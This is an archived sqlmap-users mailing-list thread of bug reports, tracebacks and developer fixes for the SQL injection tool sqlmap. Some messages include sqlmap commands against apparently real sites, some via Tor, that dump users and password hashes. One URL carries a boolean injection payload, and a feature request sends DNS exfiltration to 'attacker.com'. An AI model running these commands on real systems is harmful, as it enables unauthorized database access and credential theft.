> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> line 584, in __init__
>     self._connect()
>   File
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> line 739, in _connect
>     sock.connect((self.host, self.port))
>   File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in
> connect
>     raise GeneralProxyError((5, _generalerrors[5]))
> GeneralProxyError: (5, 'bad input')
>
>
>
>
> ------------------------------
>
> Message: 8
> Date: Tue, 16 Apr 2013 14:19:18 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] --host parameter
> To: co...@5i...
> Cc: SqlMap List <sql...@li...>
> Message-ID:
> <CA+...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi.
>
> Thank you for your report and find it fixed with the latest commit [1].
>
> Kind regards,
> Miroslav Stampar
>
> [1]
>
> https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86
>
>
> On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote:
>
> > Hello,
> > the --host doesn't work as expected, or I am doing something wrong:
> >
> >
> > this works as expected:
> >
> > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
> >
> >     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> > takeover tool
> >     http://sqlmap.org
> >
> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
> > prior mutual consent is illegal. It is the end user's responsibility to
> > obey all applicable local, state and federal laws. Developers assume no
> > liability and are not responsible for any misuse or damage caused by
> > this program
> >
> > [*] starting at 23:57:15
> >
> > [23:57:15] [INFO] testing connection to the target URL
> > [23:57:15] [INFO] heuristics detected web page charset 'ascii'
> > [23:57:15] [INFO] testing if the target URL is stable. This can take a
> > couple of seconds
> > [23:57:16] [INFO] target URL is stable
> > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
> > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
> > [23:57:16] [INFO] GET parameter 'id' is dynamic
> > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
> > might be injectable (possible DBMS: 'MySQL')
> > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
> >
> >
> > ....
> >
> >
> > this doesn't work as expected:
> >
> >  ./sqlmap.py --host='i.csland.ro'
> > --url='http://188.240.236.15/index.php?id=0'
> >
> >     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> > takeover tool
> >     http://sqlmap.org
> >
> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
> > prior mutual consent is illegal. It is the end user's responsibility to
> > obey all applicable local, state and federal laws. Developers assume no
> > liability and are not responsible for any misuse or damage caused by
> > this program
> >
> > [*] starting at 23:58:03
> >
> > [23:58:03] [INFO] testing connection to the target URL
> > [23:58:03] [CRITICAL] page not found (404)
> > it is not recommended to continue in this kind of cases. Do you want to
> > quit and make sure that everything is set up properly? [Y/n]
> > [23:58:05] [WARNING] HTTP error codes detected during run:
> >
> > ............
> >
> >
> > Of course i.csland.ro resolves to 188.240.236.15. Any idea?
> >
> > Thanks.
> >
> >
> >
> >
> ------------------------------------------------------------------------------
> > Precog is a next-generation analytics platform capable of advanced
> > analytics on semi-structured data. The platform includes APIs for
> building
> > apps and a phenomenal toolset for data science. Developers can use
> > our toolset for easy data analysis & visualization. Get a free account!
> > http://www2.precog.com/precogplatform/slashdotnewsletter
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 9
> Date: Tue, 16 Apr 2013 14:33:33 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] Sqlmap and direct connect error
> To: ???????? ?????? <vo...@s2...>
> Cc: SqlMap List <sql...@li...>
> Message-ID:
> <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...>
> Content-Type: text/plain; charset="koi8-r"
>
> Hi Vladimir.
>
> Find it "patched" with the latest commit [1]. Basically, those combinations
> should not be allowed (-d and --url; -d and --tor; etc.) and now we've
> added new option validation checks for this kind of cases.
>
> Kind regards,
> Miroslav Stampar
>
> [1]
>
> https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a
>
>
> On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote:
>
> > Hi!
> >
> > This bug detected if add direct param.
> >
> > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
> > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux  --tables
> > --exclude-sysdbs
> >
> >
> > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717,
> retry
> > your run with the latest development version from the GitHub repository.
> If
> > the exception persists, please send by e-mail to '
> > sql...@li...' or open a new issue at '
> > https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> > text and any information required to reproduce the bug. The developers
> will
> > try to reproduce the bug, fix it accordingly and get back to you.
> > sqlmap version: 1.0-dev-de99717
> > Python version: 2.7.3
> > Operating system: posix
> > Command line: sqlmap.py -d
> > **************************************************** -u
> > http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
> > --exclude-sysdbs
> > Technique: None
> > Back-end DBMS: MySQL (identified)
> > Traceback (most recent call last):
> >   File "sqlmap.py", line 87, in main
> >     start()
> >   File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
> > start
> >     action()
> >   File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in
> action
> >     setHandler()
> >   File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
> > setHandler
> >     conf.dbmsConnector.connect()
> >   File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38,
> in
> > connect
> >     self.connector = pymysql.connect(host=self.hostname, user=self.user,
> > passwd=self.password, db=self.db, port=self.port,
> > connect_timeout=conf.timeout, use_unicode=True)
> >   File
> >
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py",
> > line 93, in Connect
> >     return Connection(*args, **kwargs)
> >   File
> >
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> > line 584, in __init__
> >     self._connect()
> >   File
> >
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> > line 739, in _connect
> >     sock.connect((self.host, self.port))
> >   File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in
> > connect
> >     raise GeneralProxyError((5, _generalerrors[5]))
> > GeneralProxyError: (5, 'bad input')
> >
> >
> >
> >
> ------------------------------------------------------------------------------
> > Precog is a next-generation analytics platform capable of advanced
> > analytics on semi-structured data. The platform includes APIs for
> building
> > apps and a phenomenal toolset for data science. Developers can use
> > our toolset for easy data analysis & visualization. Get a free account!
> > http://www2.precog.com/precogplatform/slashdotnewsletter
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 10
> Date: Tue, 16 Apr 2013 23:26:39 +0200
> From: buawig <bu...@gm...>
> Subject: [sqlmap-users] feature request: offline mode for
> --dns-domain?
> To: SqlMap List <sql...@li...>
> Message-ID: <516...@gm...>
> Content-Type: text/plain; charset=UTF-8
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> Hi,
>
> in cases where sqlmap is run against targets on internal networks it
> would be great if one could tell sqlmap to simply proceed without
> expecting incoming DNS requests, because sqlmap can not be executed
> directly on the DNS server (which can't reach the target, but the
> target can reach the DNS server).
>
> For me it would be enough to simply run something like
> - -u ... --dns-domain=attacker.com --dns-port=0
> (--dns-port does not exist [yet])
>
> to let sqlmap know that it doesn't need to start a DNS listener.
>
> I would then collect and decode the DNS querries on the DNS server
> manually, but I could also envision running a second sqlmap instance
> on the DNS server with --dns-domain (but without -u) doing that job.
>
> -----BEGIN PGP SIGNATURE-----
>
> iQIcBAEBCgAGBQJRbcIPAAoJEJeRHQyF0ukM/VwQAKlZKRyuk55ZbiOzbRPztw/p...
 
[truncated message content]

Re: [sqlmap-users] sqlmap-user event not found error

[Miroslav S. <mir...@gm...>]

Hi Bob.

Please enclose the url part with quotes (e.g. ./sqlmap.py -u "..." ...)

Kind regards,
Miroslav Stampar


On Sun, May 11, 2014 at 8:32 AM, Bob <sto...@qq...> wrote:

> Hi friend,
>
>  I have problem with ! inside URL .
>
> /sqlmap.py -u
> http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=-p input_mailbar --dbms=MySQL --risk=3 --level=5 -o --param-del=
> bash: !search.do?keyword=: event not found
>
> How should i do ?
>
> thanks
>
> bob
> ------------------
>
>
>
>
> ------------------ Original ------------------
> *From: * "Miroslav Stampar";<mir...@gm...>;
> *Date: * Fri, May 31, 2013 03:00 AM
> *To: * "Bob"<sto...@qq...>;
> *Cc: * "sqlmap-users"<sql...@li...>;
> *Subject: * Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1
>
> Hi.
> Have you been able to retrieve user names normally? I mean, were they
> normally been displayed in console output?
> Also, is boolean technique the only one detected by sqlmap in your case
> (or maybe UNION)?
>  Kind regards,
> Miroslav Stampar
>
>
> On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote:
>
>> Hi friend,
>>
>>
>> Could you help me with this bug ?
>>
>>
>> [22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your
>> run with the latest development version from the GitHub repository. If the
>> exception persists, please send by e-mail to '
>> sql...@li...' or open a new issue at '
>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>> text and any information required to reproduce the bug. The developers will
>> try to reproduce the bug, fix it accordingly and get back to you.
>> sqlmap version: 1.0-dev
>> Python version: 2.7.3
>> Operating system: posix
>> Command line: ./sqlmap -u ***********************************************
>> --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP
>> -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft
>> SQL Server --users --passwords
>> Technique: BOOLEAN
>> Back-end DBMS: Microsoft SQL Server (fingerprinted)
>> Traceback (most recent call last):
>> File "./sqlmap", line 87, in main
>> start()
>> File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start
>> action()
>> File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action
>> conf.dbmsHandler.getPasswordHashes(), "password hash",
>> CONTENT_TYPE.PASSWORDS)
>> File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in
>> getPasswordHashes
>> if user in retrievedUsers:
>> TypeError: unhashable type: 'list'
>>
>> [*] shutting down at 22:54:12
>> Thanks
>>
>> BOB
>>
>>
>> ------------------ Original ------------------
>> *From: * "sqlmap-users-request"<
>> sql...@li...>;
>> *Date: * May 29, 2013
>> *To: * "sqlmap-users"<sql...@li...>;
>> *Subject: * sqlmap-users Digest, Vol 31, Issue 1
>>
>> Send sqlmap-users mailing list submissions to
>> sql...@li...
>>
>> To subscribe or unsubscribe via the World Wide Web, visit
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> or, via email, send a message with subject or body 'help' to
>> sql...@li...
>>
>> You can reach the person managing the list at
>> sql...@li...
>>
>> When replying, please edit your Subject line so it is more specific
>> than "Re: Contents of sqlmap-users digest..."
>>
>>
>> Today's Topics:
>>
>> 1. Re: Feature request (David Guimaraes)
>> 2. Re: --load-cookies (Dirk Wetter)
>> 3. Re: --load-cookies (Miroslav Stampar)
>> 4. Re: Patch for /task/<task_id>/delete in clean_filesystem
>> (Miroslav Stampar)
>> 5. Re: --load-cookies (Dirk Wetter)
>> 6. --host parameter (co...@5i...)
>> 7. Sqlmap and direct connect error (???????? ??????)
>> 8. Re: --host parameter (Miroslav Stampar)
>> 9. Re: Sqlmap and direct connect error (Miroslav Stampar)
>> 10. feature request: offline mode for --dns-domain? (buawig)
>> 11. feature request: --dns-domain for non-root users (--dns-port)
>> (buawig)
>> 12. Domain credentials (Brian Milliron)
>> 13. Re: Domain credentials (Brandon Perry)
>> 14. Re: feature request: offline mode for --dns-domain?
>> (Miroslav Stampar)
>> 15. Re: Domain credentials (Miroslav Stampar)
>> 16. Re: feature request: fetch DNS queries from DNS server via
>> HTTP (buawig)
>> 17. Re: feature request: fetch DNS queries from DNS server via
>> HTTP (Miroslav Stampar)
>> 18. MySQL error based technique bug (Konrads Smelkovs)
>> 19. Re: MySQL error based technique bug (Miroslav Stampar)
>> 20. SQLmap crashing (Phillip Wylie)
>> 21. Re: SQLmap crashing (Miroslav Stampar)
>> 22. Custom injection payload in POST (Marcell Fodor)
>> 23. Re: SQLmap crashing (Miroslav Stampar)
>> 24. I got error on windows (warezhacking)
>> 25. Appending to a dump (Stephen Shkardoon)
>> 26. Re: Appending to a dump (Miroslav Stampar)
>> 27. Re: Appending to a dump (Stephen Shkardoon)
>> 28. Re: Appending to a dump (Miroslav Stampar)
>> 29. --ignore-404 ? (buawig)
>> 30. PostgreSQL: substr('string', 1, 1) vs. substring('string'
>> from 1 for 1) (buawig)
>> 31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>> from 1 for 1) (Miroslav Stampar)
>> 32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>> from 1 for 1) (Miroslav Stampar)
>> 33. Re: --ignore-404 ? (Miroslav Stampar)
>> 34. BUG...!!!! o.O (Isai Ofir Juarez Contreras)
>> 35. Re: BUG...!!!! o.O (Miroslav Stampar)
>> 36. gun...@gm... wants to follow you. Accept?
>> (gun...@gm...)
>> 37. Direct access to mysql database (Marcell Fodor)
>> 38. Re: Direct access to mysql database (Miroslav Stampar)
>> 39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio...
>> (Badoo)
>> 40. Not getting any sensitive data from database (Marcell Fodor)
>> 41. Re: Not getting any sensitive data from database
>> (Miroslav Stampar)
>> 42. unhandled exception (kvasilopoulos)
>> 43. [SQLMAP] Unhandled exception for IPv6
>> (e.n...@st...)
>> 44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>> 45. Re: unhandled exception (Miroslav Stampar)
>> 46. Passing SOAPAction in --header (Brandon Perry)
>> 47. Re: Passing SOAPAction in --header (Miroslav Stampar)
>> 48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>> 49. Blind SQL Injection question (Guy Dufour)
>> 50. Re: Blind SQL Injection question (Chris Oakley)
>> 51. Re: Passing SOAPAction in --header (Brandon Perry)
>> 52. Re: Passing SOAPAction in --header (Brandon Perry)
>> 53. Deploy&Create SSH/tunnel with compromised MSSQL server
>> (Alok Kumar)
>> 54. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>> (Brandon Perry)
>> 55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>> (Alok Kumar)
>> 56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>> (Brandon Perry)
>> 57. SQLMAP Bug (Joe O'Hara)
>> 58. Re: SQLMAP Bug (Miroslav Stampar)
>> 59. [CRITICAL] (Thai Thao)
>> 60. Re: [CRITICAL] (Miroslav Stampar)
>> 61. Providing multiple dbms (Sebastian Nerz)
>> 62. Re: Providing multiple dbms (Miroslav Stampar)
>>
>>
>> ----------------------------------------------------------------------
>>
>> Message: 1
>> Date: Sat, 13 Apr 2013 21:40:39 -0300
>> From: David Guimaraes <sk...@gm...>
>> Subject: Re: [sqlmap-users] Feature request
>> To: Miroslav Stampar <mir...@gm...>
>> Cc: SqlMap List <sql...@li...>
>> Message-ID:
>> <CAJ...@ma...>
>> Content-Type: text/plain; charset="iso-8859-1"
>>
>> Good question Miroslav.. I tried to think in something that can be
>> implemented without ruin sqlmap query schema, but I could not come to any
>> conclusion... =(
>>
>> The thing is, sqlsus use a different approch to dump the data, making this
>> kind of thing possible...
>>
>> The solution that I found in this particular scenario is to use sqlsus,
>> unfortunately...
>>
>> Regards.
>>
>> David
>>
>>
>> On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar <
>> mir...@gm...
>> > wrote:
>>
>> > Hi David.
>> >
>> > And what do you recommend to be done in case of query with length >
>> > max_inj_length?
>> >
>> > Kind regards,
>> > Miroslav Stampar
>> > On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote:
>> >
>> >> Hi, I am trying to perform sql injection on a web site but I can not
>> get
>> >> successful due to a size limitation on the query sent to the server.
>> The
>> >> server is limiting the size of query in 512 bytes only and sqlmap do
>> not
>> >> have any customization that allows me to bypass this restriction like
>> >> sqlsus "max_inj_length" parameter. Sqlsus has a feature called
>> "autoconf"
>> >> that measure the permited query size.
>> >>
>> >> There is some chance to put this kind of feature in sqlmap?
>> >>
>> >> Thanks.
>> >>
>> >> --
>> >> David Gomes Guimar?es
>> >>
>> >>
>> >>
>> ------------------------------------------------------------------------------
>> >> Own the Future-Intel&reg; Level Up Game Demo Contest 2013
>> >> Rise to greatness in Intel's independent game demo contest.
>> >> Compete for recognition, cash, and the chance to get your game
>> >> on Steam. $5K grand prize plus 10 genre and skill prizes.
>> >> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d
>> >> _______________________________________________
>> >> sqlmap-users mailing list
>> >> sql...@li...
>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >>
>> >>
>>
>>
>> --
>> David Gomes Guimar?es
>> -------------- next part --------------
>> An HTML attachment was scrubbed...
>>
>> ------------------------------
>>
>> Message: 2
>> Date: Mon, 15 Apr 2013 11:36:37 +0200
>> From: Dirk Wetter <sp...@dr...>
>> Subject: Re: [sqlmap-users] --load-cookies
>> To: Miroslav Stampar <mir...@gm...>
>> Cc: SqlMap List <sql...@li...>
>> Message-ID: <516...@dr...>
>> Content-Type: text/plain; charset=ISO-8859-1
>>
>>
>>
>> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>> > Nevertheless, with the latest commit that check should be "neutralized"
>> now. Could you please retry it now?
>>
>> thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>> hiccups, using the same file:
>>
>> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
>> Traceback (most recent call last):
>> File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
>> assert domain_specified == initial_dot
>> AssertionError
>>
>> _warn_unhandled_exception()
>> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
>> Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>>
>> the 999.. looks strange to me.
>>
>> >
>> >
>> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
>> mir...@gm... <mailto:mir...@gm...>> wrote:
>> >
>> > Hi Dirk.
>> >
>> > Well, I would say that you have an expired cookie. Do you see that
>> value 0? That value should be a valid UNIX time representing time of cookie
>> expiration. Also, I've just tested that cookie of yours and sqlmap says:
>> "[WARNING] cookie '....' has expired"
>> >
>>
>> that's true but IMO 0 represents just a session cookie. Example:
>>
>> prompt% wget -q -O /dev/null --keep-session-cookies
>> --save-cookies=/dev/stdout bing.com
>> # HTTP cookie file.
>> # Generated by Wget on 2013-04-15 11:23:13.
>> # Edit at your own risk.
>>
>> .bing.com TRUE / FALSE 1429089794 SRCHUSR
>> AUTOREDIR=0&GEOVAR=&DOB=20130415
>> .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
>> .bing.com TRUE / FALSE 1429089794 OrigMUID
>> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>> .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
>> .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
>> .bing.com TRUE / FALSE 0 _HOP
>> .bing.com TRUE / FALSE 0 _FS NU=1
>> .bing.com TRUE / FALSE 1429089794 _FP EM=1
>> www.bing.com FALSE / FALSE 1429089794 SRCHUID
>> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>> www.bing.com FALSE / FALSE 1429089794 MUIDB
>> 333995A69E06630B2EB491169F016314
>>
>> prompt%
>>
>> Same parser problem btw if I edit the cookie file and put 1429089794 unix
>> time instead of 0 in there.
>>
>> Ok: With the prev rev ed5599f it reads this file ok (no session cookies
>> but cookies w/ expiration date) and uses the last
>> cookie only for the first 120 tries.
>>
>> Cheers, Dirk
>>
>>
>> >
>> > Kind regards,
>> > Miroslav Stampar
>> >
>> >
>> > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
>> sp...@dr...>> wrote:
>> >
>> >
>> > Hi Miroslav,
>> >
>> > thx for your prompt answer.
>> >
>> > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>> > > Hi Dirk.
>> > >
>> > > Could you please get the latest revision and retry it again?
>> > ed5599f: almost the same: with cookie in the header sqlmap takes only
>> this one.
>> > The slight difference seems to be that in the case where I didn't
>> supply a cookie
>> > sqlmap doesn't use any cookie at all, i.e. now not the one from the
>> server anymore.
>> > >
>> > > There was a situation where info messages have been wrongly written
>> that original response contained Set-Cookie in situations like yours.
>> > >
>> > > In case that everything stays as it is, I'll need to ask you to
>> provide more details. For example, cookie file would be great.
>> >
>> > sure, here you go:
>> >
>> > --snip
>> > # Netscape HTTP Cookie File
>> > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
>> > [..]
>> > --snap
>> >
>> > They are all session cookies. For easier reading here I put some blanks
>> in the line
>> > above, in "cookie-file" there aren't any though. Cookies were generated
>> with
>> > stompy and a shell script (looks he same as with
>> > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
>> >
>> > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>> >
>> > >
>> > > Also, please make sure that the cookie file contains proper cookie(s)
>> - domain name should be the same as a domain of target, cookie needs to
>> have a proper valid time, etc.
>> >
>> > see above.
>> >
>> > Cheers,
>> >
>> > Dirk
>> >
>> > >
>> > >
>> > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...<mailto:
>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>
>> wrote:
>> > >
>> > > Hi Miroslav,
>> > >
>> > > yes unfortunately.
>> > >
>> > > If I omit the cookie line in the request header completely, sqlmap
>> > > seems to take the first cookie issued by the server with set-cookie
>> (and
>> > > put's it silently in).
>> > >
>> > > Cheers,
>> > >
>> > > Dirk
>> > >
>> > >
>> > >
>> > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>> > > > Hi.
>> > > >
>> > > > And this is also happening if you are skipping "Cookie:
>> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>> > > >
>> > > > Kind regards,
>> > > > Miroslav Stampar
>> > > >
>> > > >
>> > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...<mailto:
>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>
>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:
>> sp...@dr... <mailto:sp...@dr...>>>> wrote:
>> > > >
>> > > >
>> > > > Hi folks,
>> > > >
>> > > > .... that doesn't work for me. It always uses the cookie supplied
>> > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
>> > > > from the 1st server reply is being used)
>> > > >
>> > > > So what is wrong in here:
>> > > >
>> > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>> > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>> > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>> > > > --level=2 --risk=2 -r $REQUEST
>> > > >
>> > > > The content of the file $REQUEST is:
>> > > >
>> > > > POST <URL> HTTP/1.1
>> > > > Host: <HOST>
>> > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US)
>> AppleWebKit/525.13 (KHTML, like Gecko)
>> > > > Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> <
>> http://0.2.149.6> Safari/525.13
>> > > > Accept:
>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>> > > > Accept-Language: en-US,en;q=0.5
>> > > > Accept-Encoding: gzip, deflate
>> > > > Referer: <Referer>
>> > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>> > > > Connection: keep-alive
>> > > > Content-Type: application/x-www-form-urlencoded
>> > > > Content-Length: 67
>> > > >
>> > > > <abunchofpostparams>
>> > > >
>> > > >
>> > > > No hints that cookie-file is not in correct format (I've been
>> through this,
>> > > > at least I think I so ;) ).
>> > > >
>> > > > Any insight would be much appreciated.
>> > > >
>> > > >
>> > > > Cheers,
>> > > >
>> > > > Dirk
>> > > >
>> > > >
>> > > >
>> ------------------------------------------------------------------------------
>> > > > Precog is a next-generation analytics platform capable of advanced
>> > > > analytics on semi-structured data. The platform includes APIs for
>> building
>> > > > apps and a phenomenal toolset for data science. Developers can use
>> > > > our toolset for easy data analysis & visualization. Get a free
>> account!
>> > > > http://www2.precog.com/precogplatform/slashdotnewsletter
>> > > > _______________________________________________
>> > > > sqlmap-users mailing list
>> > > > sql...@li... <mailto:
>> sql...@li...> <mailto:
>> sql...@li... <mailto:
>> sql...@li...>> <mailto:
>> sql...@li... <mailto:
>> sql...@li...> <mailto:
>> sql...@li... <mailto:
>> sql...@li...>>>
>> > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> > > >
>> > > >
>> > > >
>> > > >
>> > > > --
>> > > > Miroslav Stampar
>> > > > http://about.me/stamparm
>> > >
>> > >
>> > >
>> > >
>> > > --
>> > > Miroslav Stampar
>> > > http://about.me/stamparm
>> >
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>> >
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>>
>>
>>
>>
>> ------------------------------
>>
>> Message: 3
>> Date: Mon, 15 Apr 2013 11:45:19 +0200
>> From: Miroslav Stampar <mir...@gm...>
>> Subject: Re: [sqlmap-users] --load-cookies
>> To: Dirk Wetter <sp...@dr...>
>> Cc: SqlMap List <sql...@li...>
>> Message-ID:
>> <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
>> Content-Type: text/plain; charset="iso-8859-1"
>>
>> Hi Dirk.
>>
>> Now that crash should be "patched".
>>
>> Could you please retry it now and say if the latest revision suits your
>> needs?
>>
>> Kind regards,
>> Miroslav Stampar
>>
>>
>> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:
>>
>> >
>> >
>> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>> > > Nevertheless, with the latest commit that check should be
>> "neutralized"
>> > now. Could you please retry it now?
>> >
>> > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>> > hiccups, using the same file:
>> >
>> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
>> bug!
>> > Traceback (most recent call last):
>> > File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
>> > _really_load
>> > assert domain_specified == initial_dot
>> > AssertionError
>> >
>> > _warn_unhandled_exception()
>> > [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
>> > Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>> >
>> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>> >
>> > the 999.. looks strange to me.
>> >
>> > >
>> > >
>> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
>> > mir...@gm... <mailto:mir...@gm...>> wrote:
>> > >
>> > > Hi Dirk.
>> > >
>> > > Well, I would say that you have an expired cookie. Do you see that
